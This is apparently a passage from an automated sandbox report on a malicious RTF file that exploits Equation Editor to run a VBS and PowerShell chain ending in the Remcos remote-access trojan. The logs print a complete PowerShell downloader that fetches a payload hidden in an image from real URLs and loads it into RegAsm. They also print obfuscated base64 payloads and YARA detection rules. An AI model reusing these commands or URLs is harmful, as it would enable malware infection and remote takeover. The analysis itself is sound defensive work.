gTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167B4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_002754A010_2_002754A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0027517210_2_00275172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E0CC15_2_0043E0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041F0FA15_2_0041F0FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045415915_2_00454159
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043816815_2_00438168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004461F015_2_004461F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E2FB15_2_0043E2FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045332B15_2_0045332B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0042739D15_2_0042739D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004374E615_2_004374E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E55815_2_0043E558
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043877015_2_00438770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004378FE15_2_004378FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043394615_2_00433946
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D9C915_2_0044D9C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00427A4615_2_00427A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041DB6215_2_0041DB62
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00427BAF15_2_00427BAF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00437D3315_2_00437D33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00435E5E15_2_00435E5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00426E0E15_2_00426E0E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043DE9D15_2_0043DE9D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00413FCA15_2_00413FCA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00436FEA15_2_00436FEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                      Source: nU7Z8sPyvf.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winRTF@14/20@6/5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00417952
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040F474
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041B4A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AA4A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$7Z8sPyvf.rtfJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR72CE.tmpJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................s.l.m.g.r...v.b.s...............0.......`N................................................................6.....Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................w.i.n.r.m...v.b.s...............0.......fN................................................................6.....Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d...........6.............................6.................6.....Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: nU7Z8sPyvf.rtfReversingLabs: Detection: 63%
                      Source: nU7Z8sPyvf.rtfVirustotal: Detection: 56%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgT